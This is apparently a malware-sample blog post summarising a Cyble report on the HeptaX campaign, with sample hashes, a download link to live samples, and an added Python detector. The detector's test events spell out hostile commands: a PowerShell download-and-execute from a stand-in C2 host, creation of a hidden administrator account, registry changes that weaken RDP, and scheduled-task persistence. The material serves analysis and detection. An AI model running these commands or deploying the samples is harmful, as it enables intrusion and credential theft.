Monday, October 28, 2024

2024-10-25 HeptaX - Unauthorized RDP Connections. Malicious LNK > PowerShell > Bat files Samples

2024-10-25 Cyble: 
HeptaX: Unauthorized RDP Connections for Cyberespionage Operations

Summary:

  • The attack starts with a malicious LNK file delivered within a ZIP file, likely distributed through phishing emails, and seems to target the healthcare industry.
  • Upon execution, the LNK file initiates a PowerShell command that downloads multiple scripts and batch files from a remote server to establish persistence and control over the victim’s system.
    • The LNK file, once opened, triggers PowerShell commands that download additional payloads from hxxp://157.173.104[.]153.
    • These scripts enable the attacker to create a new user account with administrative privileges and alter RDP settings, reducing authentication requirements for easier unauthorized access.
    • A persistent shortcut (LNK) file is created in the Windows Startup folder to maintain access.
    • The primary PowerShell script communicates with the C2 server, constructing URLs with a unique identifier (UID) for the compromised machine to fetch commands or additional payloads.
    • If UAC is detected as weak or disabled, the attack proceeds with further stages that lower the system's security configurations.
    • A secondary payload, "ChromePass," is introduced, targeting Chromium-based browsers to harvest stored credentials, escalating the risk of compromised accounts.
    • Scripts configure the system to facilitate remote desktop access, enabling actions such as data exfiltration, monitoring, and installation of further malware.
    • Subsequent batch files (e.g., k1.bat, scheduler-once.bat) execute commands that hide traces, remove logs, and schedule tasks disguised as system operations to maintain persistence and evade detection.
    • The final stages involve the execution of a PowerShell script that performs reconnaissance, collects extensive system data, and sends it encoded to the C2 server.
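As an added illustration of how a defender could spot this chain in endpoint telemetry (example code written for this post, not from the Cyble report or the samples): a small Python detector that runs stage rules over constructed Sysmon-style events and only alerts when several independent stages co-occur. The event field names, the sample values, and the specific registry values for enabling RDP and disabling NLA (fDenyTSConnections, UserAuthentication) are assumptions based on the report's description of "reduced authentication requirements".

```python
import re

# Constructed Sysmon-style telemetry (field names and values are assumptions, not data
# from the report); each record mirrors one stage of the chain summarised above.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://c2.example/b.ps1')"},
    {"type": "process", "parent": "cmd.exe", "image": "net.exe", "cmd": "net user helper P@ssw0rd /add"},
    {"type": "process", "parent": "cmd.exe", "image": "net.exe", "cmd": "net localgroup administrators helper /add"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections", "data": "0"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication", "data": "0"},
    {"type": "file", "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.lnk"},
    {"type": "process", "parent": "cmd.exe", "image": "schtasks.exe", "cmd": "schtasks /create /tn Update /sc onstart /tr k1.bat"},
]

def _cmd(e):
    return e.get("cmd", "").lower()

# One rule per stage: (stage name, predicate over a single event). An LNK opened by the
# user is assumed to surface as powershell.exe spawned by explorer.exe.
RULES = [
    ("lnk_powershell_download", lambda e: e["type"] == "process" and e["parent"] == "explorer.exe"
        and "powershell" in e["image"]
        and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", _cmd(e)) is not None),
    ("new_admin_user", lambda e: e["type"] == "process" and e["image"] in ("net.exe", "net1.exe")
        and re.search(r"localgroup\s+administrators\s+\S+\s+/add", _cmd(e)) is not None),
    ("rdp_enabled", lambda e: e["type"] == "registry"
        and e["key"].lower().endswith("fdenytsconnections") and e["data"] == "0"),
    ("rdp_nla_disabled", lambda e: e["type"] == "registry"
        and e["key"].lower().endswith("userauthentication") and e["data"] == "0"),
    ("startup_lnk_persistence", lambda e: e["type"] == "file"
        and "\\startup\\" in e["path"].lower() and e["path"].lower().endswith(".lnk")),
    ("scheduled_task", lambda e: e["type"] == "process"
        and "schtasks" in e["image"] and "/create" in _cmd(e)),
]

def detect_stages(events):
    """Return the set of chain stages observed anywhere in the event stream."""
    return {name for e in events for name, pred in RULES if pred(e)}

def is_rdp_backdoor_chain(events, minimum=3):
    """Alert only when several independent stages co-occur; single stages are routine admin noise."""
    return len(detect_stages(events)) >= minimum

if __name__ == "__main__":
    print(sorted(detect_stages(SAMPLE_EVENTS)), is_rdp_backdoor_chain(SAMPLE_EVENTS))
```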


Download
File Information
  • 18e75bababa1176ca1b25f727c0362e4bb31ffc19c17e2cabb6519e6ef9d2fe5 Google Chrome.lnk
  • 1d82927ab19db7e9f418fe6b83cf61187d19830b9a7f58072eedfd9bdf628dab bb.ps1
  • 4b127e7b83148bfbe56bd83e4b95b2a4fdb69e1c9fa4e0c021a3bfb7b02d8a16 ChromePass.exe
  • 5ff89db10969cba73d1f539b12dad42c60314e580ce43d7b57b46a1f915a6a2b 202409 Resident Care Quality Improvement Strategies for Nursing Homes Enhancing Patient Satisfaction and Health Outcomes.pdf.lnk
  • 6605178dbc4d84e789e435915e86a01c5735f34b7d18d626b2d8810456c4bc72.zip
  • 999f521ac605427945035a6d0cd0a0847f4a79413a4a7b738309795fd21d3432 k1.bat
  • a8d577bf773f753dfb6b95a3ef307f8b4d9ae17bf86b95dcbb6b2fb638a629b9 b.ps1

Malware Repo Links
    Over the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.
